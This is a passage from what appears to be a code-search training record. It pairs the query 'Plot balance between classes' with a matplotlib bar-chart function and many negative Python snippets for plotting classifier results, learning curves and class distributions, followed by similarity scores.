current_state.get_neighbors()\n max_change = -math.inf\n min_change = math.inf\n next_state = None # to hold the next best neighbor\n for neighbor in neighbors:\n if neighbor in visited:\n continue # do not want to visit the same state again\n if (\n neighbor.x > max_x\n or neighbor.x < min_x\n or neighbor.y > max_y\n or neighbor.y < min_y\n ):\n continue # neighbor outside our bounds\n change = neighbor.score() - current_score\n if find_max: # finding max\n # going to direction with greatest ascent\n if change > max_change and change > 0:\n max_change = change\n next_state = neighbor\n else: # finding min\n # to direction with greatest descent\n if change < min_change and change < 0:\n min_change = change\n next_state = neighbor\n if next_state is not None:\n # we found at least one neighbor which improved the current state\n current_state = next_state\n else:\n # since we have no neighbor that improves the solution we stop the search\n solution_found = True\n\n if visualization:\n from matplotlib import pyplot as plt\n\n plt.plot(range(iterations), scores)\n plt.xlabel(\"Iterations\")\n plt.ylabel(\"Function values\")\n plt.show()\n\n return current_state", "def hillclimber_greedy(grid):\n\n # set swap to true to start the loop\n swap = True\n\n # loops until no swaps can be made\n while swap == True:\n # sets swap to false\n swap = False\n # loops through the batteries\n for b1 in grid.batteries:\n # loops through the houses in the batteries\n for h1 in b1.routes:\n # loops through the batteries\n for b2 in grid.batteries:\n # loops through the houses in the batteries\n for h2 in b2.routes:\n b1cap = h1.house.max_output + b1.current_capacity\n b2cap = h2.house.max_output + b2.current_capacity\n # checks if a swap between two houses can be made\n if h1.house.max_output < b2cap and h2.house.max_output < b1cap:\n # calculate is the swap improves the length of the connections\n len_new = distance(h1.house.location, b2.location) + distance(h2.house.location, b1.location)\n len_old = h1.length + h2.length\n\n # makes the swap if the length is improved\n if swap == False and len_new < len_old and h1.house.id != h2.house.id:\n swap = grid.swap(h1, h2)\n break\n return grid" ]
[ "0.6305694", "0.58596754", "0.5824617", "0.57462597", "0.5715227", "0.5684032", "0.56557304", "0.5591559", "0.5554532", "0.55386126", "0.5528498", "0.55246407", "0.5522697", "0.5501514", "0.5486631", "0.5482586", "0.54730695", "0.546426", "0.5456875", "0.5453615", "0.5421071", "0.54138774", "0.5413025", "0.5411192", "0.5408681", "0.54044694", "0.5395705", "0.5378931", "0.53784275", "0.53783035", "0.53772205", "0.5369596", "0.53693897", "0.53642887", "0.536011", "0.535824", "0.53497976", "0.5346345", "0.53360504", "0.5327385", "0.53265274", "0.53264254", "0.53137577", "0.5312222", "0.53112066", "0.53044534", "0.5304016", "0.5298993", "0.5298683", "0.5295499", "0.5294324", "0.5292674", "0.52920914", "0.5291429", "0.5290665", "0.52829117", "0.52827394", "0.5274343", "0.5272141", "0.5271538", "0.527119", "0.5269481", "0.5263044", "0.52613586", "0.5259244", "0.52538794", "0.5245598", "0.5245186", "0.5241252", "0.5237461", "0.5230675", "0.52304506", "0.522292", "0.5218323", "0.52180856", "0.5212351", "0.5212276", "0.52095544", "0.5202756", "0.5202478", "0.51993436", "0.5197185", "0.51965076", "0.5195096", "0.51924217", "0.51912713", "0.5188517", "0.51836574", "0.5183047", "0.5182782", "0.5177266", "0.5176249", "0.5164175", "0.5163037", "0.5160942", "0.5157797", "0.51481354", "0.51467425", "0.51413804", "0.5139445" ]
0.5833218
2
Plot balance between classes
def plot_balance_class(classes): unique, counts = np.unique(classes, return_counts=True) plt.bar(unique, counts) plt.title('Class Frequency') plt.xlabel('Class') plt.ylabel('Frequency') plt.show()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def show_class_imbalance(df, title='Class Imbalance', PATH=None):\n ax = sns.barplot(x=[\"Normal\", \"Clickbait\"], y=df.groupby(['target']).target.count())\n ax.set_title(title, size=20)\n plt.xticks([0,1],[\"Normal\", \"Clickbait\"], size = 20)\n ax.set_ylabel(\"Document Count\", size=17)\n ax.set_xlabel(\"Article Class\", size=20)\n if PATH:\n plt.savefig(PATH, bbox_inches=\"tight\", transparent=True)\n return ax", "def plot_class_balances(df, col):\n\n ser_counts = df[col].value_counts()\n ser_counts.plot.bar()\n plt.title(col + ' Counts \\n(classes={})'.format(ser_counts.shape[0]))\n \n plt.show()", "def plot(self):\n\t\traw_labels = self.make_raw_data()[1]\n\t\tbalanced_labels = self.get_extra()[1]\n\t\tfig, ax1 = subplots()\n\t\tax2 = ax1.twinx()\n\t\tx = array(range(1, NCLASSES + 1))\n\t\tl1 = ax1.bar(x - 0.3, self.prior_sizes, width = 0.25, color = 'b', align = 'center', label = 'train')\n\t\tl2 = ax2.bar(x, bincount(raw_labels - 1), width = 0.25, color = 'r', align = 'center', label = 'confident')\n\t\tl3 = ax2.bar(x + 0.3, bincount(balanced_labels - 1), width = 0.25, color = 'g', align = 'center', label = 'rebalanced')\n\t\tconfident_frac = len(raw_labels) / float(self.predictions.shape[0])\n\t\tusable_frac = len(balanced_labels) / float(self.predictions.shape[0])\n\t\tax1.set_title('at >{0:.1f}%, {1:.1f}% reliable, {2:.1f}% usable'.format(self.confidence * 100, confident_frac * 100, usable_frac * 100))\n\t\tax1.legend([l1, l2, l3], [l1.get_label(), l2.get_label(), l3.get_label()], loc = 'upper right')\n\t\tax1.set_xticks(x)", "def plot_balancer_results_per_classifier(data_balancer_results_per_classifier, parameter=(2, \"Balanced Accuracy\")):\n classifier_arr = []\n color = iter(cm.Set1(np.linspace(0, 1, len(data_balancer_results_per_classifier) + 1)))\n mean_classifier_arr = [0] * len(data_balancer_results_per_classifier[0][1])\n for (classifier_name, data_balancer_results) in data_balancer_results_per_classifier:\n individual_data_balance_plot = []\n x = 0\n for (data_balancer_name, result_arr) in data_balancer_results:\n individual_data_balance_plot.append(result_arr[parameter[0]]) # Average True rate\n mean_classifier_arr[x] += result_arr[parameter[0]]\n x += 1\n classifier_arr.append(individual_data_balance_plot)\n\n classifier_arr.append([value / float(len(data_balancer_results_per_classifier)) for value in mean_classifier_arr])\n\n fig = plt.figure(figsize=(12, 10))\n\n classifiers = np.arange(len(classifier_arr))\n data_balancers = np.arange(len(classifier_arr[0])) * 3\n bar_width = 0.2\n opacity = 0.9\n\n for i in range(len(classifier_arr)):\n if i + 1 != len(classifier_arr):\n label = data_balancer_results_per_classifier[i][0]\n else:\n label = \"Mean classification\"\n\n plt.bar(data_balancers + (i * bar_width), classifier_arr[i], bar_width,\n alpha=opacity,\n color=color.next(),\n label=label)\n\n plt.locator_params(axis='y', nbins=10)\n plt.xlabel(\"Data balance algorithm\")\n plt.ylabel(parameter[1])\n plt.legend(loc=\"lower right\", fancybox=True, frameon=True)\n plt.title(\"{0} per data balance algorithm\".format(parameter[1]))\n plt.ylim([0.0, 1.00])\n data_balance_labels = [filter(str.isupper, data_balance_name) if data_balance_name != \"None\" and len(filter(str.isupper, data_balance_name)) < 6 else data_balance_name for\n (data_balance_name, _) in data_balancer_results_per_classifier[0][1]]\n plt.xticks(data_balancers + (bar_width / 2) * len(classifiers), data_balance_labels)\n\n current_time = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n plt.savefig(os.path.dirname(os.path.realpath(__file__)) + \"/../results/data_balancer_results_per_classifier_plot_{0}_{1}.png\".format(parameter[1], current_time))\n plt.close(fig)", "def plot_model_rates(class_name, model, ax):\n true_positives, totals = model.range_metrics[class_name]\n prob_rates = model.class_prob_rates[class_name]\n\n bins = np.arange(5)\n\n # color bars based on freq.\n # norm = plt.Normalize(0, max(totals))\n # colors = mpl.cm.Blues(norm(totals))\n\n ax.bar(bins, prob_rates, color=P_BAR_COLOR, edgecolor=BAR_EDGE_COLOR)\n ax.set_ylim(0, 1)\n for axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(1.5)\n\n index = 0\n\n for xy in zip(np.arange(5), prob_rates):\n # Get class count of current index\n count = str(totals[index])\n loc = list(xy)\n # lower annotation, so its not out of the plot for large bars\n if loc[1] > .9:\n xy = tuple([loc[0], loc[1] - .1])\n y_val = xy[1]\n ax.annotate(count, xy=xy, textcoords='data', ha='center',\n va='bottom', fontsize=8)\n index += 1", "def test_multiclass_balance(self):\n dataset = make_fixture(binary=False, split=False)\n\n oz = ClassBalance()\n assert oz.fit(dataset.y) is oz\n assert oz._mode == BALANCE\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def show_learning_curve(self):\n\n # Loop output classes\n for c in range(1,self.n_output_classes):\n # Get data\n x_values = np.array(self.n_class_samples_list[c])\n accuracy = np.array(self.accuracy_list[c])\n precision = np.array(self.precision_list[c])\n recall = np.array(self.recall_list[c])\n F1 = np.array(self.F1_list[c])\n\n # Make plot\n with sns.axes_style(\"ticks\"):\n fig,ax = plt.subplots()\n plt.plot([np.min(x_values),np.max(x_values)],[0.5,0.5],\n color='#777777',linestyle='--')\n plt.plot([np.min(x_values),np.max(x_values)],[0.66,0.66],\n color='#777777',linestyle=':')\n plt.plot([np.min(x_values),np.max(x_values)],[0.8,0.8],\n color='#777777',linestyle=':')\n plt.plot([np.min(x_values),np.max(x_values)],[0.9,0.9],\n color='#777777',linestyle=':')\n\n plt.plot( x_values, accuracy, color='#000000',\n linewidth=1, label='Accuracy' )\n plt.plot( x_values, precision, color='#0000aa',\n linewidth=1, label='Precision' )\n plt.plot( x_values, recall, color='#00aa00',\n linewidth=1, label='Recall' )\n plt.plot( x_values, F1, color='#aa0000',\n linewidth=2, label='F1' )\n\n plt.yticks( [0, 0.5, 0.66, 0.8, 0.9, 1.0],\n ['0','0.5','0.66','0.8','0.9','1.0'], ha='right' )\n plt.xlim(np.max(x_values)*-0.02,np.max(x_values)*1.02)\n plt.ylim(-0.02,1.02)\n plt.xlabel('Number of training samples')\n plt.ylabel('Performance')\n plt.title('Learning curve, class {}'.format(c))\n sns.despine(ax=ax, offset=0, trim=True)\n lgnd = plt.legend(loc=4, ncol=1, frameon=True, fontsize=9)\n lgnd.get_frame().set_facecolor('#ffffff')\n ax.spines['left'].set_bounds(0,1)\n ax.spines['bottom'].set_bounds(np.min(x_values),np.max(x_values))", "def plot_progress(self):\n plt.plot(-self.training_average_reward, label='negative average reward')\n plt.plot(self.training_average_electricity_cost_in_euros, label='electricity cost in euros')\n plt.legend()\n plt.xlabel('Epoch')\n plt.ylabel('cost in euros')\n plt.title('Average electricity cost in euros and reward')\n plt.show()", "def plot_data(self, classA, classB):\n plt.scatter(classA[:,0], classA[:,1], color='cyan', alpha=0.7, s=7)\n plt.scatter(classB[:,0], classB[:,1], color='purple', alpha=0.7, s=7)\n plt.axis('tight')\n plt.show()", "def visualize_confidence_level(prediction_proba):\n data = (prediction_proba[0]*100).round(2)\n grad_percentage = pd.DataFrame(data = data,columns = ['Porcentage'],index = ['Est','Int','Int_Est','Rob','Rob_Est','Rob_Int','Rob_Int_Est'])\n ax = grad_percentage.plot(kind='barh', figsize=(7, 4), color='#0067e7', zorder=10, width=0.8)\n ax.legend().set_visible(False)\n ax.set_xlim(xmin=0, xmax=100)\n \n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.spines['left'].set_visible(True)\n ax.spines['bottom'].set_visible(True)\n\n ax.tick_params(axis=\"both\", which=\"both\", bottom=\"off\", top=\"off\", labelbottom=\"on\", left=\"off\", right=\"off\", labelleft=\"on\")\n \n vals = ax.get_xticks()\n for tick in vals:\n ax.axvline(x=tick, linestyle='dashed', alpha=0.4, color='#eeeeee', zorder=1)\n\n ax.set_xlabel(\" Porcentage(%) Nivel de confianza\", labelpad=2, weight='bold', size=12)\n ax.set_ylabel(\"Victimización\", labelpad=10, weight='bold', size=12)\n ax.set_title('Nivel de confianza de la predicción ', fontdict=None, loc='center', pad=None, weight='bold')\n\n st.pyplot()\n \n return", "def test_quick_method(self):\n dataset = make_fixture(binary=False, split=False)\n\n viz = class_balance(dataset.y, show=False)\n\n assert isinstance(viz, ClassBalance)\n self.assert_images_similar(viz, tol=0.5)", "def plot(self):\n # plot the data for checking\n fig, [[ax1,ax2],[ax3,ax4], [ax5,ax6]] = plt.subplots(\n 3,2, figsize=(10,8))\n\n # Relative height\n self.board_reference.plot(\n column='z_reference', cmap='GnBu_r', legend=True, ax=ax1)\n self.board_intervention.plot(\n column='z_reference', cmap='GnBu_r', legend=True, ax=ax2)\n\n # Landuse\n self.board_reference.plot(\n column='landuse', legend=True, ax=ax3, cmap='viridis',\n scheme='equal_interval', k=11)\n self.board_intervention.plot(\n column='landuse', legend=True, ax=ax4, cmap='viridis',\n scheme='equal_interval', k=11)\n\n index = np.arange(7)\n xticks = self.PotTax_reference.index.values\n bar_width = 0.3\n\n # plot the initial and new situation comparison\n label = (\"reference: \" +\n str(round(self.PotTax_reference.sum().TFI, 2)))\n reference = ax5.bar(\n index, self.PotTax_reference.values.flatten(), bar_width,\n label=label, tick_label=xticks)\n label = (\"intervention: \" +\n str(round(self.PotTax_intervention.sum().TFI, 2)))\n intervention = ax5.bar(\n index+bar_width, self.PotTax_intervention.values.flatten(),\n bar_width, label=label, tick_label=xticks)\n ax5.set_ylabel(\"total value\")\n ax5.legend(loc='best')\n for tick in ax5.get_xticklabels():\n tick.set_rotation(90)\n\n # plot the percentage increase/decrease between the initial and new\n # situation\n data = self.PotTax_percentage.values.flatten()\n percentage = ax6.bar(\n index, data, bar_width, label=\"percentage\", tick_label=xticks)\n ax6.set_ylabel(\"increase (%)\")\n minimum = min(data)\n maximum = max(data)\n size = len(str(int(round(maximum))))\n maximum = int(str(maximum)[:1])\n maximum = (maximum + 1) * (10**(size-1))\n ax6.set_ylim([min(0, minimum), maximum])\n for tick in ax6.get_xticklabels():\n tick.set_rotation(90)", "def test_quick_method_with_splits(self):\n dataset = make_fixture(binary=False, split=True)\n\n viz = class_balance(dataset.y.train, dataset.y.test, show=False)\n\n assert isinstance(viz, ClassBalance)\n self.assert_images_similar(viz)", "def plot_scenario_distribution(self):\n x = self.arms\n\n y = self.df.groupby('price').mean().Converted[x]\n y_sex_0 = self.df[self.df.Sex == 0].groupby('price').mean().Converted[x]\n y_sex_1 = self.df[self.df.Sex == 1].groupby('price').mean().Converted[x]\n y_age_0 = self.df[self.df.Under_30 == 0].groupby('price').mean().Converted[x]\n y_age_1 = self.df[self.df.Under_30 == 1].groupby('price').mean().Converted[x]\n\n fig, ax_list = plt.subplots(2,1, figsize=(12, 9))\n\n for ax in ax_list:\n ax.grid(alpha=0.3, linestyle='--')\n\n ax.set_ylim(bottom=0, top=0.6)\n ax.set_xlim(left=50, right=104)\n\n ax.set_xlabel(\"Price\", fontsize=14)\n ax.set_ylabel(\"Conversion Rate\", fontsize=14)\n\n ax.set_xticks(self.arms)\n ax.set_xticklabels(self.arms.astype(np.int64), fontsize=12, alpha=0.7)\n ax.set_yticks(np.linspace(0, 0.7, 8))\n ax.set_yticklabels([str((i * 100).astype(np.int64)) + \"%\" for i in np.linspace(0, 0.7, 8)], fontsize=12, alpha=0.7)\n\n ax.spines['right'].set_alpha(0)\n ax.spines['left'].set_alpha(0.3)\n ax.spines['top'].set_alpha(0)\n ax.spines['bottom'].set_alpha(0.3)\n\n ax_list[0].plot(x, y, label='Global')\n ax_list[0].plot(x, y_sex_0, label='Male', color='moccasin')\n ax_list[0].plot(x, y_sex_1, label='Female', color='darkorange')\n\n ax_list[1].plot(x, y, label='Global')\n ax_list[1].plot(x, y_age_0, label='Under 30', color='red')\n ax_list[1].plot(x, y_age_1, label='Over 30', color='darkred')\n\n ax_list[0].legend()\n ax_list[1].legend()\n\n fig.suptitle(\"Conversion Rate\", fontsize=22)\n\n fig.show()\n\n plt.savefig('chapter5_pricing.png')", "def visualise_dataset_balancer_results(results, range=(-0.5, 0.5),\n colors=(\"#64B3DE\", \"#1f78b4\", \"#B9B914\", \"#FBAC44\", \"#bc1659\", \"#33a02c\", \"grey\", \"#b15928\", \"#6a3d9a\", \"#e31a1c\", \"#6ABF20\", \"#ff7f00\", \"#6a3d9a\"),\n exclude=(\"SVM (linear)\", \"Logistic regression\", \"Random forest\")):\n current_time = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n file_name = \"raw_dump_{0}.txt\".format(current_time)\n with open(os.path.dirname(os.path.realpath(__file__)) + \"/../results/\" + file_name, \"wb\") as output_file:\n output_file.write(str(results))\n sns.set(style='ticks')\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(1, 1, 1)\n markers = [\"s\", \"d\", \"o\", \"^\", \"*\"]\n size = [150, 200, 200, 200, 250]\n hatches = [None, \"////\", \"..\"]\n\n # Move left y-axis and bottom x-axis to centre, passing through (0,0)\n ax.spines['left'].set_position('center')\n ax.spines['bottom'].set_position((\"axes\", 0.5))\n\n # Eliminate upper and right axes\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n\n # Show ticks in the left and lower axes only\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n ax.set_axis_on()\n ax.spines['left'].set_color('black')\n ax.spines['bottom'].set_color('black')\n plt.xlabel(\"Change in TPR\")\n plt.ylabel(\"Change in TNR\")\n\n ax.xaxis.set_label_coords(0.1, 0.53)\n ax.yaxis.set_label_coords(0.53, 0.9)\n\n plt.ylim(range[0], range[1])\n plt.xlim(range[0], range[1])\n balancer_labels = ([], [])\n classifier_labels = ([], [])\n data_set_index = 0\n for (data_set, dataset_result) in results:\n\n none_true_pos_per_classifier = {}\n none_true_neg_per_classifier = {}\n\n for (classifier_description, result_arr) in dataset_result:\n for (balancer_description, results) in result_arr:\n if balancer_description == \"None\":\n none_true_pos_per_classifier[classifier_description] = results[3]\n none_true_neg_per_classifier[classifier_description] = results[4]\n break\n\n i = 0\n for (classifier_description, result_arr) in dataset_result:\n if classifier_description in exclude:\n continue\n balancer_index = 0\n for (balancer_description, results) in result_arr:\n if balancer_description != \"None\":\n if data_set_index == 0 and balancer_index == 0:\n classifier_labels[0].append(mpatches.Patch(color=colors[i], label=classifier_description, alpha=0.8))\n classifier_labels[1].append(classifier_description)\n ax.scatter(results[3] - none_true_pos_per_classifier[classifier_description], results[4] - none_true_neg_per_classifier[classifier_description],\n marker=markers[balancer_index % len(markers)], hatch=hatches[balancer_index % len(hatches)], s=size[balancer_index % len(markers)], alpha=0.8, color=colors[i],\n edgecolor=\"black\" if colors[i] != \"black\" else \"grey\", zorder=balancer_index % len(markers), lw=0.8)\n # Work around to get legend entries correct\n pt = ax.scatter(-99999999999, -9999999999, marker=markers[balancer_index % len(markers)], hatch=hatches[balancer_index % len(hatches)], s=200, alpha=0.8, color=\"white\",\n edgecolor=\"black\", zorder=data_set_index, lw=0.8)\n if i == 0:\n balancer_labels[0].append(pt)\n balancer_labels[1].append(balancer_description)\n balancer_index += 1\n i += 1\n data_set_index += 1\n legend = plt.legend(balancer_labels[0] + classifier_labels[0], balancer_labels[1] + classifier_labels[1], loc='lower center', bbox_to_anchor=(0.5, -0.2), fancybox=False, frameon=False, ncol=7)\n legend.get_frame().set_facecolor('#ffffff')\n\n sns.despine()\n current_time = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n plt.savefig(os.path.dirname(os.path.realpath(__file__)) + \"/../results/classifier_dataset_plt_{0}.png\".format(current_time), bbox_extra_artists=((legend,)), bbox_inches='tight')\n plt.close(fig)", "def plot_model_curves(class_name, model, range_metrics, ax):\n def plot_axis(ax, data, color):\n \"\"\"\n Plot data on axis in certain color\n \"\"\"\n x_indices = [0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n ax.scatter(x_indices, data, color=color, s=4)\n ax.plot(x_indices, data, color=color, linewidth=2)\n ax.set_yticks([]) # same for y ticks\n ax.set_ylim([0, 1])\n # Get balanced purities\n preds = np.concatenate(model.results)\n if model.name == \"Binary Classifiers\":\n purities = get_binary_balanced_purity_ranges(\n preds, model.class_labels, 0.1, model.class_counts)[class_name]\n else:\n purities = get_balanced_purity_ranges(\n preds, model.class_labels, 0.1, model.class_counts)[class_name]\n\n # Get completenesses\n comps = get_completeness_ranges(model.class_counts, range_metrics, class_name)\n\n print(\"\\n\\n Model: \" + str(model.name) + \", class: \" + class_name)\n print(\"Completeness\")\n print(comps)\n print(\"Purity\")\n print(purities)\n\n plot_axis(ax, comps, C_BAR_COLOR)\n ax2 = ax.twinx() # instantiate a second axes that shares the same x-axis\n ax2.set_ylim([0, 1])\n plot_axis(ax2, purities, P_BAR_COLOR)\n for axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(1.5)\n return ax2", "def plot_balance_list(balance_list, b_scale='linear', progress = False, n_lims = None):\n if n_lims == None:\n n_min = 0\n n_max=len(balance_list)\n else:\n n_min = n_lims[0]\n n_max = n_lims[1]\n ncols=2\n nrows=int(np.ceil((n_max-n_min)/ncols))\n _, axes = plt.subplots(nrows, ncols, figsize=(22, 5*nrows))\n for n in range(n_min, n_max):\n ni = n-n_min \n i = int(np.floor(ni / ncols))\n j=ni % ncols\n r_p = []\n if progress: \n for k in range(len(balance_list[n])-1):\n r_p.append(np.abs(balance_list[n][k]-balance_list[n][k+1])/balance_list[n][k])\n\n axes[i,j].plot(balance_list[n], label='balance', color='b')#we put [1:] because want not to show drop in the beginning: TODO: understand fully and explain\n axes[i,j].set_title('Outer loop # '+ str(n))\n # axes[i,j].set_yscale('log')\n # axes[i,j].set_xscale('log')\n axes[i,j].grid(True)\n axes[i,j].set_ylabel('balance norm')\n axes[i,j].legend()\n axes[i,j].set_yscale(b_scale)\n if progress: \n ax_2=axes[i,j].twinx()\n ax_2.plot(r_p, 'g')\n ax_2.set_yscale('log')\n ax_2.set_ylabel('relative change')", "def drawLines_income(t0, t1, t2, t3):\r\n t0.pd()\r\n t1.pd()\r\n t2.pd()\r\n t3.pd()\r\n t0.pencolor(\"blue\")\r\n t0.pensize(3)\r\n t1.pensize(3)\r\n t2.pensize(3)\r\n t3.pensize(3)\r\n t1.pencolor(\"red\")\r\n t2.pencolor(\"green\")\r\n t3.pencolor(\"gold\")\r\n t0.rt(90)\r\n t1.rt(90)\r\n t2.rt(90)\r\n t3.rt(90)\r\n t0.fd(70)\r\n t1.fd(70)\r\n t2.fd(70)\r\n t3.fd(70)", "def plot_exp1():\n legend = ['unweighted', 'weighted']\n labels = ['Degree','Closeness','Current-flow closeness','Betweenness','Current-flow betweenness','Load','Eigenvector','PageRank','HITS authorities','HITS hubs']\n\n # classification\n d = [[0.52500000000000002,0.49444444444444446], # Degree\n [0.57499999999999996,0.57499999999999996], # Closeness\n [0.56944444444444442,0.58333333333333337], # Current-flow closeness\n [0.36388888888888887,0.36944444444444446], # Betweenness\n [0.23333333333333334,0.20833333333333334], # Current-flow betweenness\n [0.35555555555555557,0.36666666666666664], # Load\n [0.49722222222222223,0.45555555555555555], # Eigenvector\n [0.52777777777777779,0.51111111111111107], # PageRank\n [0.49722222222222223,0.45555555555555555], # HITS authorities\n [0.49722222222222223,0.45555555555555555]] # HITS hubs\n ys = {0:'0.0',.1:'0.1',.2:'0.2', .3:'0.3',.4:'0.4',.5:'0.5',.6:'0.6'}\n fig = plotter.tikz_barchart(d, labels, scale = 3.5, yscale=2.8, color='black', legend=legend, legend_sep=1.0, tick=False, y_tics=ys)\n data.write_to_file(fig,'../../masteroppgave/report/imgs/tikz/dependency_eval_class.tex',mode='w')\n\n # retrieval\n d = [[0.18149811054435275,0.18821229318222113], # Degree\n [0.17184314735361236,0.18216618328598347], # Closeness\n [0.14606637651984622,0.13586098100141117], # Betweenness\n [0.17399729543537901,0.17613717518129621], # Current-flow closeness\n [0.042019078720146409,0.042019078720146409], # Current-flow betweenness\n [0.14700372822743263,0.15104493506838745], # Load\n [0.19854658693196564,0.17540014008712554], # Eigenvector\n [0.17725358882165362,0.17252331100724849], # PageRank\n [0.19854658693196564,0.17540014008712554], # HITS authorities\n [0.19854658693196564,0.17540014008712554]] # HITS hubs\n ys = {0:'0.0',.05:'0.05', .1:'0.1',.15:'0.15', .2:'0.2'}\n fig = plotter.tikz_barchart(d, labels, scale = 3.5, yscale=8, color='black', legend=legend, legend_sep=1.0, tick=False, grid_step=0.05, y_tics=ys)\n data.write_to_file(fig,'../../masteroppgave/report/imgs/tikz/dependency_eval_retr.tex',mode='w')", "def inclass1():\n import numpy as np\n import matplotlib.pyplot as plt\n\n\n N = 50\n x = np.random.rand(N)\n y = np.random.rand(N)\n colors = np.random.rand(N)\n area = np.pi * (15 * np.random.rand(N))**2 # 0 to 15 point radiuses\n\n plt.scatter(x, y, s=area, c=colors, alpha=0.5)\n plt.show()", "def plot(self):\r\n \r\n\r\n print(\"Printing decision surfaces of decision trees\")\r\n plot_colors = \"rb\"\r\n plot_step = 0.02\r\n n_classes = 2\r\n for _ in range (self.n_estimators):\r\n plt.subplot(2, 3, _ + 1)\r\n x_min, x_max = self.X.iloc[:, 0].min() - 1, self.X.iloc[:, 0].max() + 1\r\n y_min, y_max = self.X.iloc[:, 1].min() - 1, self.X.iloc[:, 1].max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),np.arange(y_min, y_max, plot_step))\r\n plt.tight_layout(h_pad=0.5, w_pad=0.5, pad=2.5)\r\n Z = self.clfs[_].predict(np.c_[xx.ravel(), yy.ravel()])\r\n Z = np.array(Z)\r\n Z = Z.reshape(xx.shape)\r\n cs = plt.contourf(xx, yy, Z, cmap=plt.cm.RdBu)\r\n for i, color in zip(range(n_classes), plot_colors):\r\n if i == 0:\r\n idx = np.where(self.y == -1)\r\n if i == 1:\r\n idx = np.where(self.y == 1)\r\n for i in range (len(idx[0])):\r\n plt.scatter(self.X.loc[idx[0][i]][0], self.X.loc[idx[0][i]][1],c=color,cmap=plt.cm.RdBu, edgecolor='black', s=15)\r\n plt.suptitle(\"Decision surface of a decision tree using paired features\")\r\n plt.legend(loc='lower right', borderpad=0, handletextpad=0)\r\n plt.axis(\"tight\")\r\n\r\n plt.show()\r\n fig1 = plt\r\n\r\n # Figure 2\r\n print(\"Printing decision surface by combining the individual estimators\")\r\n plot_colors = \"rb\"\r\n plot_step = 0.02\r\n n_classes = 2\r\n x_min, x_max = self.X.iloc[:, 0].min() - 1, self.X.iloc[:, 0].max() + 1\r\n y_min, y_max = self.X.iloc[:, 1].min() - 1, self.X.iloc[:, 1].max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),np.arange(y_min, y_max, plot_step))\r\n plt.tight_layout(h_pad=0.5, w_pad=0.5, pad=2.5)\r\n Z = config.Classifier_AB.predict(np.c_[xx.ravel(), yy.ravel()])\r\n Z = np.array(Z)\r\n Z = Z.reshape(xx.shape)\r\n cs = plt.contourf(xx, yy, Z, cmap=plt.cm.RdBu)\r\n for i, color in zip(range(n_classes), plot_colors):\r\n if i == 0:\r\n idx = np.where(self.y == -1)\r\n if i == 1:\r\n idx = np.where(self.y == 1)\r\n for i in range (len(idx[0])):\r\n plt.scatter(self.X.loc[idx[0][i]][0], self.X.loc[idx[0][i]][1],c=color,cmap=plt.cm.RdBu, edgecolor='black', s=15)\r\n plt.suptitle(\"Decision surface by combining individual estimators\")\r\n plt.legend(loc='lower right', borderpad=0, handletextpad=0)\r\n plt.axis(\"tight\")\r\n\r\n plt.show()\r\n fig2 = plt\r\n\r\n return [fig1,fig2]", "def figure_10_12_b():\n xs = np.arange(-6,6,0.1)\n plt.plot(xs,sigmoid(xs))\n x=2.5\n plt.scatter(x,sigmoid(x))\n plt.plot(xs,logistic_lower_bound(xs,x))\n plt.show()", "def draw(self, amount):\n # make sure balance doesn't go below zero\n self.__balance = max(self.__balance-amount, 0)\n return self.__balance", "def plot_associative_learning_progress(ax, df):\n\n num_objects_list = sorted(df.curr_num_objects.unique())\n legend_list = []\n for idx in num_objects_list:\n ax.plot(df[df.curr_num_objects == idx].groupby('objects_iter').rewards.mean())\n legend_list.append(f'ns={idx}')\n ax.set_xlabel('Stimulus iteration')\n ax.set_ylabel('P(correct)')\n ax.set_ylim([0.4, 1])\n ax.legend(legend_list)", "def displayBalance(self):\n orders = self.trader.tradeData.get(\n 'openOrders',\n 'Failed to read orderCount')\n# uncomment 3 lines below for orderType debug printing\n## ordertype = type(orders)\n# print'DEBUG: helper.displayBalance orders TYPE is',ordertype\n# print'DEBUG: helper.displayBalance orders:',orders\n if isinstance(orders, int) and orders > 0:\n print\"Open Orders:\", orders\n self.processOrders(printOutput=True)\n self.separator()\n print'Available Balances:'\n funds = self.trader.tradeData['funds']\n for bal in funds.keys():\n if funds[bal] >= 0.01:\n print bal.upper() + ':', funds[bal]\n self.separator()", "def printBalance(self):\n\n print(\"\\nBalance - {self.name}\".format(self=self))\n print(\"Account balance: £{self.balance:.2f}\".format(self=self))", "def __init__(self, balance=0):\n self.balance = balance", "def create_graph(self, backtest):\n \n # check number of currencies\n no_currencies = len(np.unique(signals.currency_id))\n \n # plot capital\n fig, ax = plt.subplots(1+no_currencies/2,2)\n ax[0, 0].plot(backtest.capital)\n ax[0, 1].plot(backtest.capital) \n \n # plot each currency \n \n return true", "def plot_class_distribution(labels):\n num_classes = get_num_classes(labels)\n count_map = Counter(labels)\n counts = [count_map[i] for i in range(num_classes)]\n idx = np.arange(num_classes)\n plt.bar(idx, counts, width=0.8, color='b')\n plt.xlabel('Class')\n plt.ylabel('Number of samples')\n plt.title('Class distribution')\n plt.xticks(idx, idx)\n plt.show()", "def parity_plot(y_pred, y_act):\n\n fig = plt.figure(figsize=FIG_SIZE)\n plt.scatter(y_act, y_pred)\n plt.plot([y_act.min(), y_act.max()], [y_act.min(), y_act.max()],\n lw=4, color='r')\n plt.xlabel('Actual')\n plt.ylabel('Predicted')\n\n return fig", "def plot_progression(weights, bhs, bvs):\n\tweights_plot = []\n\tfor i in range(40):\n\t\tweights_plot.append(weights[i][0][0])\t# only plots the first value in the matrix every time\n\tplt.plot(weights_plot)\n\n\tplt.show()", "def plot_percentage_difference_graph(results, datasets, name_suffix=\"\", parameter=\"BACC\", x_label=\"Feature selection approach\", difference_from=\"no feature selection\", 